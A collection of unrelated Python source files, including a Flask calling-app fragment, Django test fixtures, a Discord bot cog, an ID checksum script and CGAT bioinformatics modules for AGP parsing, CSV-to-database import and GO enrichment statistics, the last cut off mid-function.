return callee, raw_callee['phone']
@app.route('/')
def root():
return app.send_static_file('index.html')
@app.route('/call_count')
@cross_origin()
def call_count():
return db.count_calls()
@app.route('/leaderboard')
@cross_origin()
def leaderboard():
return jsonify(leaderboard=db.get_leaderboard(), total_called=db.count_calls())
@app.route('/sign_in', methods=['POST'])
@timeblock
def sign_in():
# log signin
data = request.get_json()
if data:
store_event('sign_in', data)
return 'sign_in success'
#TODO return failure message if calling out of hours
# add time-ban decorator to all methods
@app.route('/connect_caller', methods=['POST'])
@timeblock
def connect_caller():
data = request.get_json()
data['session_id'] = calls.make_call(data['phoneNumber'])
store_event('connect_caller', data)
return jsonify(sessionId=data['session_id'])
@app.route('/connect_callee', methods=['POST'])
@timeblock
def connect_callee():
data = request.get_json()
callee, phone = get_callee()
if os.environ.get('PRODUCTION') is None:
phone = config.get('TEST_CALLEE')
calls.send_signal(data['sessionId'], phone)
event_data = {'caller': data, 'callee': callee, 'phone': phone}
store_event('connect_callee', event_data)
return jsonify(callee)
@app.route('/save_call', methods=['POST'])
def save_call():
raw_data = request.get_json()
# check key
callee_id = raw_data['callee']['id']
callee_key = raw_data['callee']['key']
if not check_key(callee_id, callee_key):
return 'failed'
source_data = {
'callee': CALLEES[callee_id],
'caller': raw_data['caller'],
'call': raw_data['callInfo'],
}
call_data_config = config.get('CALL_DATA_FORM')
data = {}
for field_source_name, field_source_values in call_data_config['fields'].iteritems():
for k,v in field_source_values.iteritems():
data[k] = source_data[field_source_name].get(v, '')
url = call_data_config['url']
requests.post(url, data=data)
store_event('save_call', {'raw_data': raw_data, 'saved_data': data})
return 'saved'
if __name__ == "__main__":
port = os.environ.get('PORT')
if port:
port = int(port)
app.run(debug=True, host='0.0.0.0', port=port)
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
``` |
{
"source": "85volodina/dark_poetry",
"score": 2
} |
#### File: tests/fixtures/fixture_user.py
```python
import pytest
@pytest.fixture
def user(django_user_model):
return django_user_model.objects.create_user(
username="TestUser", password="<PASSWORD>"
)
@pytest.fixture
def user_client(user, client):
client.force_login(user)
return client
```
#### File: dark_poetry/users/tests.py
```python
from django.contrib.auth import get_user_model
from django.test import Client, TestCase
User = get_user_model()
class ProfileTest(TestCase):
def setUp(self):
self.client_not_auth = Client()
self.user = User.objects.create_user(
username="kotik", email="<EMAIL>", password="<PASSWORD>"
)
def test_profile(self):
response = self.client_not_auth.get("/kotik/")
self.assertEqual(response.status_code, 200)
self.assertIsInstance(response.context["author"], User)
self.assertEqual(
response.context["author"].username, self.user.username
)
``` |
{
"source": "85yago/discordpy-cog-test",
"score": 3
} |
#### File: src/cogs/hello.py
```python
import asyncio
import discord
from discord.ext import commands
from discord.ext.commands.core import command
class Hello(commands.Cog):
def __init__(self, bot: commands.Bot) -> None:
self.bot = bot
@commands.command(name="hello", aliases=["hi"])
async def _hello(self, ctx):
"""Return "hello"!"""
await ctx.send("hello, Cog!")
def setup(bot: commands.Bot):
bot.add_cog(Hello(bot))
``` |
{
"source": "861007/lottery",
"score": 3
} |
#### File: 861007/lottery/identity_card_rule.py
```python
def verifyID(id):
alphaTable ={'A': 1, 'B': 10, 'C': 19, 'D': 28, 'E': 37, 'F': 46,
'G': 55, 'H': 64, 'I': 39, 'J': 73, 'K': 82, 'L': 2, 'M': 11,
'N': 20, 'O': 48, 'P': 29, 'Q': 38, 'R': 47, 'S': 56, 'T': 65,
'U': 74, 'V': 83, 'W': 21, 'X': 3, 'Y': 12, 'Z': 30}
sum = alphaTable[id[0]] + int(id[1]) * 8 + int(id[2]) * 7 + int(id[3]) * 6 + int(id[4]) * 5 + int(id[5]) * 4 + int(id[6]) * 3 + int(id[7]) * 2 + int(id[8]) * 1 + int(id[9])
if sum % 10 == 0:
print('正確')
else:
print('有誤')
id = input('輸入身分證')
verifyID(id)
``` |
{
"source": "861934367/cgat",
"score": 2
} |
#### File: cgat/CGAT/AGP.py
```python
class ObjectPosition(object):
def map(self, start, end):
if self.mOrientation:
return start + self.start, end + self.start
else:
return end + self.start, start + self.start
class AGP(object):
"""Parser for AGP formatted files."""
def readFromFile(self, infile):
"""read an agp file.
Example line::
scaffold_1 1 1199 1 W contig_13 1 1199 +
This method converts coordinates to zero-based coordinates
using open/closed notation.
In AGP nomenclature
(http://www.ncbi.nlm.nih.gov/genome/guide/Assembly/AGP_Specification.html)
objects (obj) like scaffolds are assembled from components
(com) like contigs.
Component types are
W
WGS sequence
N
gap of specified length.
"""
self.mMapComponent2Object = {}
self.mMapObject2Component = {}
for line in infile:
if line[0] == "#":
continue
data = line[:-1].split("\t")
obj_id, obj_start, obj_end, ncoms, com_type, com_id = data[:6]
if com_type == "N":
continue
com_start, com_end, orientation = data[6:9]
obj_start, obj_end = int(obj_start) - 1, int(obj_end)
com_start, com_end = int(com_start) - 1, int(com_end)
orientation = orientation in ("+", "0", "na")
if com_start != 0:
raise "beware, non zero com_start"
object = ObjectPosition()
object.mId = obj_id
object.start = obj_start
object.end = obj_end
object.mOrientation = orientation
self.mMapComponent2Object[com_id] = object
def mapLocation(self, id, start, end):
"""map a genomic location.
Raises
------
KeyError
If `id` is not present.
"""
if id not in self.mMapComponent2Object:
raise KeyError("id %s is not known" % (id))
pos = self.mMapComponent2Object[id]
return (pos.mId, ) + pos.map(start, end)
```
#### File: cgat/CGAT/CSV2DB.py
```python
import os
import string
import re
import time
import tempfile
import types
from CGAT import Experiment as E
from CGAT import CSV as CSV
from CGAT import IOTools as IOTools
import sqlite3
def executewait(dbhandle, statement, error,
retry=False,
wait=5,
args=()):
'''execute sql statement.
Retry on error, if retry is True.
Returns a cursor object.
'''
cc = dbhandle.cursor()
i = 20
while i > 0:
try:
cc.execute(statement, args)
return cc
except sqlite3.OperationalError as e:
msg = e.message
E.warn("import failed: msg=%s, statement=\n %s" %
(msg, statement))
# TODO: check for database locked msg
if not retry:
raise e
if not re.search("locked", str(msg)):
raise e
time.sleep(wait)
i -= 1
continue
break
raise sqlite3.OperationalError("Database locked and too many retries")
def quoteRow(row, take,
map_column2type,
missing_values,
null="NULL",
string_value="%s"):
"""return a dictionary with properly quoted values."""
# set empty values for int/float to NULL
d = {}
for t in take:
v = row[t]
if v == "":
d[t] = null
elif v in missing_values:
d[t] = null
elif map_column2type[t] in (types.IntType, types.FloatType):
d[t] = str(row[t])
else:
d[t] = string_value % row[t]
return d
def quoteTableName(name, quote_char="_", backend="sqlite"):
if backend == "sqlite":
# no special characters. Column names can not start with a number.
if name[0] in "0123456789":
name = "_" + name
return re.sub("[-(),\[\].:]", "_", name)
elif backend in ("mysql", "postgres"):
if name[0] in "0123456789":
name = "_" + name
return re.sub("[-(),\[\]]:", "_", name)
def createTable(dbhandle,
error,
tablename,
options,
retry=True,
ignore_empty=True,
ignore_columns=[],
rename_columns=[],
lowercase=False,
ignore_duplicates=True,
indices=[],
rows=None,
headers=None,
first_column=None,
existing_tables=set(),
append=False):
# create table by guessing column types from data type.
if rows:
map_column2type, ignored, max_values = CSV.getMapColumn2Type(
rows,
ignore_empty=ignore_empty,
get_max_values=True)
if ignored:
E.info("ignored columns: %s" % str(ignored))
headers = map_column2type.keys()
headers.sort()
elif headers:
map_column2type = dict(zip(headers, [None, ] * len(headers)))
ignored = 0
columns_to_ignore = set([x.lower() for x in ignore_columns])
columns_to_rename = dict([x.lower().split(":")
for x in rename_columns])
take = []
# associate headers to field names
columns = []
present = {}
for header_index, h in enumerate(headers):
hh = h
if lowercase:
hh = string.lower(h)
if hh in columns_to_ignore:
continue
if hh in present:
if ignore_duplicates:
continue
else:
raise ValueError("duplicate column %s" % hh)
present[hh] = 1
take.append(h)
if map_column2type[h] == int:
max_value = max_values[h]
if max_value > 2147483647:
t = "BIGINT DEFAULT '0'"
elif max_value > 32767:
t = "INTEGER DEFAULT '0'"
else:
t = "SMALLINT DEFAULT '0'"
elif map_column2type[h] == float:
t = "FLOAT DEFAULT '0'"
else:
if h in options.indices:
t = options.index
else:
t = options.text
# remove special characters from column names
if hh == "":
if first_column is not None and header_index == 0:
hh = first_column
else:
raise ValueError("column '%s' without header " % h)
hh = columns_to_rename.get(hh, hh)
hh = re.sub('''['"]''', "", hh)
hh = re.sub("[,;.:\-\+/ ()%?]", "_", hh)
if hh[0] in "0123456789":
hh = "_" + hh
columns.append("%s %s" % (hh, t))
if not options.append:
# delete old table if it exists
while 1:
try:
cc = dbhandle.cursor()
# mysql: removed '' around table name
statement = "DROP TABLE IF EXISTS %s" % tablename
E.debug(statement)
cc.execute(statement)
dbhandle.commit()
cc.close()
E.info("existing table %s deleted" % tablename)
except sqlite3.OperationalError, msg:
E.warn(msg)
time.sleep(5)
continue
except error, msg:
E.warn("could not delete existing table %s: %s" %
(tablename, str(msg)))
dbhandle.rollback()
if not retry:
raise error(msg)
elif tablename in existing_tables:
# table exists, but drop did not work (e.g. database lock)
time.sleep(5)
continue
else:
# table might not have existed
break
break
# create new table
statement = "CREATE TABLE %s ( %s );" % (
tablename, ", ".join(columns))
E.debug("table create:\n# %s" % (statement))
while 1:
try:
cc = dbhandle.cursor()
cc.execute(statement)
cc.close()
dbhandle.commit()
except error, msg:
E.warn("table creation failed: msg=%s, statement=\n %s" %
(msg, statement))
# TODO: check for database locked msg
if not retry:
raise error(msg)
if not re.search("locked", str(msg)):
raise error("%s: %s" % (msg, statement))
time.sleep(5)
continue
break
E.info("table %s created successfully." % tablename)
return take, map_column2type, ignored
def run(infile, options, report_step=10000):
options.tablename = quoteTableName(
options.tablename, backend=options.backend)
if options.map:
m = {}
for x in options.map:
f, t = x.split(":")
m[f] = t
options.map = m
else:
options.map = {}
existing_tables = set()
quick_import_separator = "\t"
if options.database_backend == "postgres":
import psycopg2
raise NotImplementedError("needs refactoring for commandline options")
dbhandle = psycopg2.connect(options.psql_connection)
error = psycopg2.Error
options.null = "NULL"
options.string_value = "'%s'"
options.text = "TEXT"
options.index = "TEXT"
if options.insert_quick:
raise ValueError("quick import not implemented.")
elif options.database_backend == "mysql":
import MySQLdb
dbhandle = MySQLdb.connect(host=options.database_host,
user=options.database_username,
passwd=options.database_password,
port=options.database_port,
db=options.database_name)
error = Exception
options.null = "NULL"
options.string_value = "%s"
options.text = "TEXT"
options.index = "VARCHAR(40)"
if options.insert_quick:
raise ValueError("quick import not implemented.")
elif options.backend == "sqlite":
import sqlite3
dbhandle = sqlite3.connect(options.database_name)
try:
os.chmod(options.database_name, 0664)
except OSError, msg:
E.warn("could not change permissions of database: %s" % msg)
# Avoid the following error:
# sqlite3.ProgrammingError: You must not use 8-bit bytestrings
# unless you use a text_factory that can interpret 8-bit
# bytestrings (like text_factory = str). It is highly
# recommended that you instead just switch your application
# to Unicode strings
# Note: might be better to make csv2db unicode aware.
dbhandle.text_factory = str
error = sqlite3.OperationalError
options.insert_many = True # False
options.null = None # "NULL"
options.text = "TEXT"
options.index = "TEXT"
options.string_value = "%s" # "'%s'"
statement = "SELECT name FROM sqlite_master WHERE type='table'"
cc = executewait(dbhandle, statement, error, options.retry)
existing_tables = set([x[0] for x in cc])
cc.close()
# use , as separator
quick_import_statement = \
"sqlite3 %s '.import %%s %s'" % \
(options.database_name, options.tablename)
quick_import_separator = "|"
if options.header is not None:
options.header = [x.strip() for x in options.header.split(",")]
if options.utf:
reader = CSV.UnicodeDictReader(infile,
dialect=options.dialect,
fieldnames=options.header)
else:
reader = CSV.DictReader(infile,
dialect=options.dialect,
fieldnames=options.header)
if options.replace_header:
try:
reader.next()
except StopIteration:
pass
E.info("reading %i columns to guess column types" % options.guess_size)
rows = []
for row in reader:
if None in row:
raise ValueError(
"undefined columns in input file at row: %s" % row)
try:
rows.append(IOTools.convertDictionary(row, map=options.map))
except TypeError, msg:
E.warn(
"incomplete line? Type error in conversion: "
"'%s' with data: %s" % (msg, str(row)))
except ValueError, msg:
E.warn(
"incomplete line? Type error in conversion: "
"'%s' with data: %s" % (msg, str(row)))
if len(rows) >= options.guess_size:
break
E.info("read %i rows for type guessing" % len(rows))
E.info("creating table")
if len(rows) == 0:
if options.allow_empty:
if not reader.fieldnames:
E.warn("no data - no table created")
else:
# create empty table and exit
take, map_column2type, ignored = createTable(
dbhandle,
error,
options.tablename,
options,
retry=options.retry,
headers=reader.fieldnames,
ignore_empty=options.ignore_empty,
ignore_columns=options.ignore_columns,
rename_columns=options.rename_columns,
lowercase=options.lowercase,
ignore_duplicates=options.ignore_duplicates,
indices=options.indices,
first_column=options.first_column,
existing_tables=existing_tables,
append=options.append)
E.info("empty table created")
return
else:
raise ValueError("empty table")
else:
take, map_column2type, ignored = createTable(
dbhandle,
error,
options.tablename,
options,
rows=rows,
retry=options.retry,
headers=reader.fieldnames,
ignore_empty=options.ignore_empty,
ignore_columns=options.ignore_columns,
rename_columns=options.rename_columns,
lowercase=options.lowercase,
ignore_duplicates=options.ignore_duplicates,
indices=options.indices,
first_column=options.first_column,
existing_tables=existing_tables,
append=options.append)
def row_iter(rows, reader):
for row in rows:
yield quoteRow(row, take, map_column2type,
options.missing_values,
null=options.null,
string_value=options.string_value)
for data in reader:
yield quoteRow(IOTools.convertDictionary(data, map=options.map),
take,
map_column2type,
options.missing_values,
null=options.null,
string_value=options.string_value)
ninput = 0
E.info("inserting data")
if options.insert_quick:
E.info("using quick insert")
outfile, filename = tempfile.mkstemp()
E.debug("dumping data into %s" % filename)
for d in row_iter(rows, reader):
ninput += 1
os.write(outfile, quick_import_separator.join(
[str(d[x]) for x in take]) + "\n")
if ninput % report_step == 0:
E.info("iteration %i\n" % ninput)
os.close(outfile)
statement = quick_import_statement % filename
E.debug(statement)
# infinite loop possible
while 1:
retcode = E.run(statement, cwd=os.getcwd(), close_fds=True)
if retcode != 0:
E.warn("import error using statement: %s" % statement)
if not options.retry:
raise ValueError(
"import error using statement: %s" % statement)
time.sleep(5)
continue
break
os.remove(filename)
# there is no way to insert NULL values into sqlite. The only
# solution is to update all colums.
for column in take:
executewait(dbhandle,
"UPDATE %s SET %s = NULL WHERE %s = 'None'" % (
options.tablename, column, column),
error,
options.retry)
elif options.insert_many:
data = []
for d in row_iter(rows, reader):
ninput += 1
data.append([d[x] for x in take])
if ninput % report_step == 0:
E.info("iteration %i" % ninput)
statement = "INSERT INTO %s VALUES (%s)" % (
options.tablename, ",".join("?" * len(take)))
E.info("inserting %i rows" % len(data))
E.debug("multiple insert:\n# %s" % statement)
while 1:
try:
dbhandle.executemany(statement, data)
except error, msg:
E.warn("import failed: msg=%s, statement=\n %s" %
(msg, statement))
# TODO: check for database locked msg
if not options.retry:
raise error(msg)
if not re.search("locked", str(msg)):
raise error(msg)
time.sleep(5)
continue
break
else:
# insert line by line (could not figure out how to do bulk loading with
# subprocess and COPY FROM STDIN)
statement = "INSERT INTO %s VALUES (%%(%s)s)" % (options.tablename,
')s, %('.join(take))
# output data used for guessing:
for d in row_iter(rows, reader):
ninput += 1
E.debug("single insert:\n# %s" % (statement % d))
cc = executewait(dbhandle, statement, error,
retry=options.retry,
args=d)
cc.close()
if ninput % report_step == 0:
E.info("iteration %i" % ninput)
E.info("building indices")
nindex = 0
for index in options.indices:
nindex += 1
try:
statement = "CREATE INDEX %s_index%i ON %s (%s)" % (
options.tablename, nindex, options.tablename, index)
cc = executewait(dbhandle, statement, error, options.retry)
cc.close()
E.info("added index on column %s" % (index))
except error, msg:
E.info("adding index on column %s failed: %s" % (index, msg))
statement = "SELECT COUNT(*) FROM %s" % (options.tablename)
cc = executewait(dbhandle, statement, error, options.retry)
result = cc.fetchone()
cc.close()
noutput = result[0]
E.info("ninput=%i, noutput=%i, nskipped_columns=%i" %
(ninput, noutput, len(ignored)))
dbhandle.commit()
def buildParser():
parser = E.OptionParser(
version="%prog version: $Id$",
usage=globals()["__doc__"])
parser.add_option("--csv-dialect", dest="dialect", type="string",
help="csv dialect to use [default=%default].")
parser.add_option(
"-m", "--map", dest="map", type="string", action="append",
help="explicit mapping function for columns The format is "
"column:type (e.g.: length:int) [default=%default].")
parser.add_option("-t", "--table", dest="tablename", type="string",
help="table name for all backends [default=%default].")
parser.add_option("-d", "--database", dest="database", type="string",
help="database name for sqlite3 [default=%default].")
parser.add_option(
"-H", "--header-names", dest="header", type="string",
help="',' separated list of column headers for files without "
"column header [default=%default].")
parser.add_option("--replace-header", dest="replace_header",
action="store_true",
help="replace header with --header-names instead of "
"adding it [default=%default].")
parser.add_option("-l", "--lowercase-fields", dest="lowercase",
action="store_true",
help="force lower case column names "
"[default=%default].")
parser.add_option("-u", "--ignore-duplicates", dest="ignore_duplicates",
action="store_true",
help="ignore columns with duplicate names "
"[default=%default].")
parser.add_option("-s", "--ignore-same", dest="ignore_same",
action="store_true",
help="ignore columns with identical values "
"[default=%default].")
parser.add_option("--ignore-column", dest="ignore_columns", type="string",
action="append",
help="ignore columns [default=%default].")
parser.add_option("--rename-column", dest="rename_columns", type="string",
action="append",
help="rename columns [default=%default].")
parser.add_option("--first-column", dest="first_column", type="string",
help="name of first column - permits loading CSV "
"table where the first "
"column name is the empty string [default=%default].")
parser.add_option("-e", "--ignore-empty", dest="ignore_empty",
action="store_true",
help="ignore columns which are all empty "
"[default=%default].")
parser.add_option("-q", "--quick", dest="insert_quick",
action="store_true",
help="try quick file based import - needs to "
"be supported by the backend [default=%default].")
parser.add_option("-i", "--add-index", dest="indices", type="string",
action="append",
help="create an index for the named column "
"[default=%default].")
parser.add_option("-a", "--allow-empty-file", dest="allow_empty",
action="store_true",
help="allow empty table [default=%default].")
parser.add_option("--retry", dest="retry", action="store_true",
help="retry if an SQL statement fails - warning: "
"THIS MIGHT CAUSE DEADLOCKS [default=%default].")
parser.add_option("-z", "--from-zipped", dest="from_zipped",
action="store_true",
help="input is zipped.")
parser.add_option("--append", dest="append",
action="store_true",
help="append to existing table [default=%default].")
parser.add_option(
"--utf8", dest="utf", action="store_true",
help="standard in is encoded as UTF8 rather than local default"
", WARNING: does not strip comment lines yet [default=%default]")
parser.set_defaults(
map=[],
dialect="excel-tab",
database="csvdb",
lowercase=False,
tablename="csv",
from_zipped=False,
ignore_duplicates=False,
ignore_identical=False,
ignore_empty=False,
insert_many=False,
ignore_columns=[],
rename_columns=[],
header=None,
replace_header=False,
guess_size=1000,
report_step=10000,
backend="sqlite",
indices=[],
missing_values=("na", "NA", ),
insert_quick=False,
allow_empty=False,
retry=False,
utf=False,
append=False,
)
return parser
```
#### File: cgat/CGAT/GO.py
```python
import sys
import re
import math
import random
import collections
import scipy
import scipy.stats
import scipy.special
import numpy
from CGAT import Stats as Stats
from CGAT import Experiment as E
from CGAT import IOTools as IOTools
from CGAT import Database as Database
from CGAT import CSV as CSV
from rpy2.robjects import r as R
MIN_FLOAT = sys.float_info.min
# The following code was taken from:
#
# http://mail.python.org/pipermail/python-list/2006-January/359797.html
#
#
def lnchoose(n, m):
nf = scipy.special.gammaln(n + 1)
mf = scipy.special.gammaln(m + 1)
nmmnf = scipy.special.gammaln(n - m + 1)
return nf - (mf + nmmnf)
def hypergeometric_gamma(k, n1, n2, t):
if t > n1 + n2:
t = n1 + n2
if k > n1 or k > t:
return 0
elif t > n2 and ((k + n2) < t):
return 0
else:
c1 = lnchoose(n1, k)
c2 = lnchoose(n2, t - k)
c3 = lnchoose(n1 + n2, t)
# print "hyperg:", k, n1, n2, t, math.exp(c1 + c2 - c3)
return max(math.exp(c1 + c2 - c3), MIN_FLOAT)
def hypergeometric_P(k, n0, n1, t):
GSL_DBL_EPSILON = 1e-10
assert t <= (n0 + n1), "t larger than population size"
assert n0 >= 0, "n0 < 0"
assert n1 >= 0, "n1 < 0"
if k >= n0 or k >= t:
P = 1.0
elif (k < 0.0):
P = 0.0
else:
P = 0.0
mode = int(float(t * n0) / float(n0 + n1))
relerr = 1.0
if k < mode:
i = k
relerr = 1.0
while(i >= 0 and relerr > GSL_DBL_EPSILON and P < 1.0):
tmp = hypergeometric_gamma(i, n0, n1, t)
P += tmp
relerr = tmp / P
i -= 1
else:
i = mode
relerr = 1.0
while(i <= k and relerr > GSL_DBL_EPSILON and P < 1.0):
tmp = hypergeometric_gamma(i, n0, n1, t)
P += tmp
relerr = tmp / P
i += 1
i = mode - 1
relerr = 1.0
while(i >= 0 and relerr > GSL_DBL_EPSILON and P < 1.0):
tmp = hypergeometric_gamma(i, n0, n1, t)
P += tmp
relerr = tmp / P
i -= 1
return P
def hypergeometric_Q(k, n0, n1, t):
GSL_DBL_EPSILON = 1e-10
assert t <= (n0 + n1), "t larger than population size"
assert n0 >= 0, "n0 < 0"
assert n1 >= 0, "n1 < 0"
if k >= n0 or k >= t:
P = 1.0
elif (k < 0.0):
P = 0.0
else:
P = 0.0
mode = int(float(t * n0) / float(n0 + n1))
relerr = 1.0
if k < mode:
i = mode
relerr = 1.0
while(i <= t and relerr > GSL_DBL_EPSILON and P < 1.0):
tmp = hypergeometric_gamma(i, n0, n1, t)
P += tmp
relerr = tmp / P
i += 1
i = mode - 1
relerr = 1.0
while(i > k and relerr > GSL_DBL_EPSILON and P < 1.0):
tmp = hypergeometric_gamma(i, n0, n1, t)
P += tmp
relerr = tmp / P
i -= 1
else:
i = k + 1
relerr = 1.0
while(i <= t and relerr > GSL_DBL_EPSILON and P < 1.0):
tmp = hypergeometric_gamma(i, n0, n1, t)
P += tmp
relerr = tmp / P
i += 1
return P
class Error(Exception):
"""Base class for exceptions in this module."""
def __str__(self):
return str(self.message)
def _get_message(self, message):
return self._message
def _set_message(self, message):
self._message = message
message = property(_get_message, _set_message)
class InputError(Error):
"""Exception raised for errors in the input.
Attributes:
expression -- input expression in which the error occurred
message -- explanation of the error
"""
def __init__(self, message):
self.message = message
class GOEntry:
mNameSpaceMap = {
'molecular_function': 'mol_function',
'cellular_component': 'cell_location',
'biological_process': 'biol_process',
}
def __init__(self, default_namespace="ontology"):
self.mNameSpace = default_namespace
def fromOBO(self, section):
"""read entry form an OBO formatted file."""
self.mIsA = []
for line in section:
data = line[:-1].split(":")
term = data[0]
rest = ":".join(data[1:]).strip()
if term == "name":
self.mName = rest
elif term == "id":
self.mId = rest
elif term == "namespace":
self.mNameSpace = self.mNameSpaceMap.get(rest, rest)
elif term == "def":
self.mDefinition = rest
elif term == "exact_synonym":
self.mSynonym = rest
elif term == "is_a":
self.mIsA.append(rest)
elif term == "comment":
self.mComment = rest
elif term == "is_obsolete":
self.mIsObsolete = True
# ------------------------------------------------------------------------
def readOntology(infile):
"""read ontology in OBO format from infile.
returns a dictionary of Ontology entries.
"""
result = {}
def iterate_blocks(infile):
lines = []
for line in infile:
if line.strip() == "":
if lines:
yield lines
lines = []
continue
lines.append(line)
default_namespace = "ontology"
for section in iterate_blocks(infile):
if section[0].startswith("[Term]"):
go = GOEntry(default_namespace=default_namespace)
go.fromOBO(section)
result[go.mId] = go
else:
for line in section:
data = line[:-1].split(":")
if data[0] == "default-namespace":
default_namespace = data[1].strip()
return result
# ------------------------------------------------------------------------
class GOSample:
"""store results from sampling.
"""
def __init__(self, mmin, mmax, mmean, mstddev, mprobovers, mprobunders, counts):
self.mMin = mmin
self.mMax = mmax
self.mMean = mmean
self.mStddev = mstddev
self.mProbabilitiesOverRepresentation = mprobovers
self.mProbabilitiesUnderRepresentation = mprobunders
self.mCounts = counts
# ------------------------------------------------------------------------
class GOResult:
mIsOverRepresented = False
mGOId = None
mSampleCountsCategory = 0
mBackgroundCountsCategory = 0
mSampleCountsTotal = 0
mBackgroundCountsTotal = 0
mProbabilityOverRepresentation = 0
mProbabilityUnderRepresentation = 0
mPValue = 1.0
def __init__(self, goid=None):
self.mGOId = goid
def UpdateProbabilities(self):
"""calculate probabilities for given counts.
"""
if self.mBackgroundCountsTotal == 0:
return
# various sanity checs
assert self.mBackgroundCountsCategory >= self.mSampleCountsCategory, \
"%s: more counts in foreground (%i) than in the background (%i) - make sure the foreground is part of the background." %\
(self.mGOId, self.mSampleCountsCategory,
self.mBackgroundCountsCategory)
assert self.mBackgroundCountsTotal >= self.mBackgroundCountsCategory, \
"%s: background: more counts in category (%i) than in total (%i)." %\
(self.mGOId, self.mBackgroundCountsCategory,
self.mBackgroundCountsTotal)
assert self.mSampleCountsTotal >= self.mSampleCountsCategory, \
"%s: forerground: more counts in category (%i) than in total (%i)." %\
(self.mGOId, self.mSampleCountsCategory, self.mSampleCountsTotal)
if self.mSampleCountsCategory == 0:
self.mProbabilityOverRepresentation = 1.0
else:
self.mProbabilityOverRepresentation = hypergeometric_Q(self.mSampleCountsCategory - 1,
self.mBackgroundCountsCategory,
self.mBackgroundCountsTotal -
self.mBackgroundCountsCategory,
self.mSampleCountsTotal)
self.mProbabilityUnderRepresentation = hypergeometric_P(self.mSampleCountsCategory,
self.mBackgroundCountsCategory,
self.mBackgroundCountsTotal -
self.mBackgroundCountsCategory,
self.mSampleCountsTotal)
self.mPValue = min(
self.mProbabilityOverRepresentation, self.mProbabilityUnderRepresentation)
if self.mSampleCountsTotal == 0 or self.mBackgroundCountsCategory == 0:
self.mRatio = "na"
else:
self.mRatio = float(self.mSampleCountsCategory) * self.mBackgroundCountsTotal / \
self.mSampleCountsTotal / self.mBackgroundCountsCategory
def getHeaders(self):
return ["scount", "stotal", "spercent",
"bcount", "btotal", "bpercent",
"ratio",
"pvalue", "pover", "punder"]
def __str__(self):
"""return string representation."""
return "%i\t%i\t%s\t%i\t%i\t%s\t%s\t%6.4e\t%6.4e\t%6.4e" % \
(self.mSampleCountsCategory,
self.mSampleCountsTotal,
IOTools.prettyPercent(
self.mSampleCountsCategory, self.mSampleCountsTotal),
self.mBackgroundCountsCategory,
self.mBackgroundCountsTotal,
IOTools.prettyPercent(
self.mBackgroundCountsCategory, self.mBackgroundCountsTotal),
IOTools.val2str(self.mRatio),
self.mPValue,
self.mProbabilityOverRepresentation,
self.mProbabilityUnderRepresentation)
class GOResults:
'''container for go results.'''
def __init__(self):
# dictionary of (GOID,GoResult) tuples
self.mResults = {}
self.mNumGenes = 0
self.mBackgroundCountsTotal = 0
self.mSampleCountsTotal = 0
def __str__(self):
"""return string representation."""
lines = []
lines.append("\t".join(
map(str, (self.mNumGenes, self.mBackgroundCountsTotal, self.mSampleCountsTotal))))
for k, v in self.mResults.items():
lines.append("%s\t%s" % (k, str(v)))
return "\n".join(lines)
# ------------------------------------------------------------------------
class GOInfo:
mGOId = None
mGOType = None
mDescription = None
def __init__(self,
goid=None,
go_type=None,
description=None):
self.mDescription = description
self.mGOId = goid
self.mGOType = go_type
def __str__(self):
if self.mGOId is None:
return "\t".join(map(str, ("", "", "")))
else:
return "\t".join(map(str, (self.mGOId, self.mGOType, self.mDescription)))
def getHeaders(self):
return ["goid", "go_catagory", "go_description"]
# ------------------------------------------------------------------------
class GOMatch(GOInfo):
mEvidence = None
def __init__(self,
goid=None,
go_type=None,
description=None,
evidence=None):
GOInfo.__init__(self, goid, go_type, description)
self.mEvidence = evidence
def __str__(self):
return "\t".join(map(str, (self.mGOId, self.mGOType, self.mDescription, self.mEvidence)))
# ---------------------------------------------------------------------
def FilterByGOIds(gene2go, go2info):
"""
filter gene_id to go_id lookup by a list of go_ids
returns a new gene2go mapping.
used to restrict GO terms to GO_slim and remove alternates
gene2go # starting set, map of genes to go terms
go2info # alt ids are repeats of superceding ids
"""
filtered_gene2go = {}
for gene_id in gene2go.keys():
new_go = set()
for go in gene2go[gene_id]:
if go.mGOId in go2info:
new_go.add(go)
if new_go:
filtered_gene2go[gene_id] = list(new_go)
return filtered_gene2go
# ---------------------------------------------------------------------
def MapGO2Slims(gene2go, go2slim, ontology=None):
"""filter gene2go lookup by a list of go_ids in go2slim.
gene2go: map of genes to go terms
go2slim: map of go categories to goslim go categories
If ontology is given, missing descriptions of go entries
are added from the ontology.
returns a new gene2go mapping.
"""
# build map of go identifiers to go info
map_go2info = {}
if ontology:
for go in ontology.values():
map_go2info[go.mId] = GOInfo(goid=go.mId,
go_type=go.mNameSpace,
description=go.mName)
else:
for gene_id, gos in gene2go.items():
for go in gos:
map_go2info[go.mGOId] = go
filtered_gene2go = {}
for gene_id, gos in gene2go.items():
new_go = set()
for go in gos:
if go.mGOId in go2slim:
for gg in go2slim[go.mGOId]:
if gg in map_go2info:
new_go.add(map_go2info[gg])
else:
raise IndexError(
"description for mapped go term not present: %s -> %s" %
(go.mGOId, gg))
if new_go:
filtered_gene2go[gene_id] = list(new_go)
return filtered_gene2go
# ------------------------------------------------------------------------
def GetGOSlims(infile):
"""
returns a map of go identifiers to slim categories
Input is the output of Chris Mungal's map2slim.pl.
"""
go2go = {}
for line in infile:
if line[:len("part_of")] == "part_of":
continue
mapped, parents = line.split("//")
go, goslims = mapped.split("=>")
goslims = goslims.split(" ")
if len(goslims) == 0:
continue
go2go[go.strip()] = filter(
lambda x: len(x), map(lambda x: x.strip(), goslims))
return go2go
# ------------------------------------------------------------------------
def GetGOFrequencies(gene2go, genes):
"""count number of each go category in gene list.
return a tuple containing:
* the total number of GO categories found.
* dictionary of counts per GO category
* dictionary of genes found with GO categories
"""
counts = {}
total = 0
found_genes = {}
for gene_id in genes:
if gene_id not in gene2go:
continue
found_genes[gene_id] = 1
for go in gene2go[gene_id]:
if go.mGOId not in counts:
counts[go.mGOId] = 0
counts[go.mGOId] += 1
total += 1
return total, counts, found_genes
# ------------------------------------------------------------------------
def AnalyseGO(gene2go,
genes,
genes_background=None,
do_probabilities=True):
"""analyse go ids.
goids: list of goids to analyse
genes: sample set of genes
genes_background: background set of genes (default: all)
"""
if genes_background is None:
genes_background = gene2go.keys()
result = GOResults()
# get background frequencies
(background_counts_total, background_counts, background_genes) = \
GetGOFrequencies(gene2go,
genes_background)
result.mBackgroundCountsTotal = background_counts_total
result.mBackgroundNumCategories = len(background_counts)
result.mBackgroundGenes = background_genes
# get sample frequencies
(sample_counts_total, sample_counts, sample_genes) = \
GetGOFrequencies(gene2go,
